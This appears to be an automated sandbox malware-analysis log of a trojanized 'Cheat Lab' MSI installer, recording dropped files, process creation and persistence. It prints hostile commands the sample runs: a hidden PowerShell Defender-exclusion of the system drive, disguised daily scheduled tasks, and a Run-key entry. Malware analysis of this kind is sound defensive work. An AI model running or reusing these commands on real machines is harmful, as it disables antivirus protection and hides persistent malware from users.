          Source: Cheat.Lab.2.7.1.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs Cheat.Lab.2.7.1.msi
          Source: Cheat.Lab.2.7.1.msiBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs Cheat.Lab.2.7.1.msi
          Source: Cheat.Lab.2.7.1.msiBinary or memory string: OriginalFilenameaischeduler.dllF vs Cheat.Lab.2.7.1.msi
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\MSI5CFA.tmp 426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
          Source: connect.exe.11.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\Installer\MSI7D5A.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.1.msi"
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 14B5C758307391A0BF1CDD495750E97E C
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 89A97588E5A998E3A3D91B47458C8C78
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 19958F299480DC364B0F0BF5C3172345 E Global\MSI0000
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI7D5A.tmp C:\Windows\Installer\MSI7D5A.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:47 /f /tn AMDCheckUpdates_NzEx /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua""
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:47 /f /tn "LuaJIT" /tr ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua""
          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua
          Source: unknownProcess created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
          Source: unknownProcess created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8016 -s 840
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 14B5C758307391A0BF1CDD495750E97E CJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 89A97588E5A998E3A3D91B47458C8C78Jump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 19958F299480DC364B0F0BF5C3172345 E Global\MSI0000Jump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI7D5A.tmp C:\Windows\Installer\MSI7D5A.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.batJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.luaJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"Jump to behavior
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:47 /f /tn AMDCheckUpdates_NzEx /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua""Jump to behavior
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:47 /f /tn "LuaJIT" /tr ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua""Jump to behavior
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\OKKIBIRI.htmJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5CFA.tmpJump to behavior
          Source: classification engineClassification label: mal44.troj.evad.winMSI@30/52@2/3
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A44BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,6_2_00A44BA0
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AEEEE80 GetLastError,FormatMessageA,17_2_00007FF73AEEEE80
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A43860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,6_2_00A43860
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_03
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeMutant created: \Sessions\1\BaseNamedObjects\Sun711
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8016
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A445B0 LoadResource,LockResource,SizeofResource,6_2_00A445B0
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\CheatLab CorpJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat"
          Source: C:\Windows\System32\msiexec.exeAutomated click: Next >
          Source: C:\Windows\System32\msiexec.exeAutomated click: Install
          Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: OK
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Cheat.Lab.2.7.1.msiStatic file information: File size 2820608 > 1048576
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab CorpJump to behavior
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1Jump to behavior
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.luaJump to behavior
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeJump to behavior
          Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.batJump to behavior
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI7D5A.tmp, 00000006.00000000.2063346881.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, MSI7D5A.tmp, 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI7C0E.tmp.1.dr, MSI7D5A.tmp.1.dr
          Source: Binary string: mscorlib.pdb source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdbb source: Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI5E96.tmp.0.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI5E96.tmp.0.dr
          Source: Binary string: mscorlib.ni.pdb source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: mscorlib.pdb0 source: WER4B71.tmp.dmp.25.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: Cheat.Lab.2.7.1.msi, MSI5D78.tmp.0.dr, MSI7BB0.tmp.1.dr, MSI5E18.tmp.0.dr, 51799a.msi.1.dr, MSI7AF2.tmp.1.dr, MSI92D9.tmp.0.dr, MSI8673.tmp.1.dr, MSI5D99.tmp.0.dr, MSI5ED6.tmp.0.dr, MSI92A9.tmp.0.dr, MSI7B80.tmp.1.dr, MSI5DA9.tmp.0.dr, MSI5CFA.tmp.0.dr, MSI5EB6.tmp.0.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI7D5A.tmp, 00000006.00000000.2063346881.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, MSI7D5A.tmp, 00000006.00000002.2085115089.0000000000A87000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI7C0E.tmp.1.dr, MSI7D5A.tmp.1.dr
          Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: Cheat.Lab.2.7.1.msi, 51799a.msi.1.dr, MSI7C0E.tmp.1.dr, 51799b.rbs.1.dr, MSI7C0F.tmp.1.dr, MSI7CBC.tmp.1.dr

          Data Obfuscation

          barindex
          Suspicious powershell command line found
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"Jump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A6323C push ecx; ret 6_2_00A6324F
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AE6499C push rbp; ret 17_2_00007FF73AE649D8
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1DE499C push rbp; ret 18_2_00007FF7B1DE49D8
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0040A888 push ecx; ret 21_2_0040A89B
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0041E140 push eax; ret 21_2_0041E167
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0040FD61 push ecx; ret 21_2_0040FD74
          Source: LuaJIT.exe.1.drStatic PE information: section name: _RDATA
          Source: NzEx.exe.11.drStatic PE information: section name: _RDATA
          Source: connect.exe.11.drStatic PE information: section name: .qbjfz
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0041C000 VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,VirtualProtect,lstrlenW,CreateThread,Sleep,WaitForSingleObject,21_2_0041C000
          Source: NzEx.exe.11.drStatic PE information: real checksum: 0x124374 should be: 0x124384
          Source: LuaJIT.exe.1.drStatic PE information: real checksum: 0x124374 should be: 0x124384

          Persistence and Installation Behavior

          barindex
          Drops executables to the windows directory (C:\Windows) and starts them
          Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI7D5A.tmpJump to behavior
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeFile created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI92A9.tmpJump to dropped file
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeFile created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI92D9.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7BB0.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7CBC.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5CFA.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5EB6.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7C0F.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7AF2.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7D5A.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5D78.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5E18.tmpJump to dropped file
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeFile created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5ED6.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5D99.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8673.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5DA9.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI5E96.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7B80.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7BB0.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7CBC.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7C0F.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7AF2.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7D5A.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI8673.tmpJump to dropped file
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7B80.tmpJump to dropped file

          Boot Survival

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:47 /f /tn AMDCheckUpdates_NzEx /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua""
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LuaJITJump to behavior
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LuaJITJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
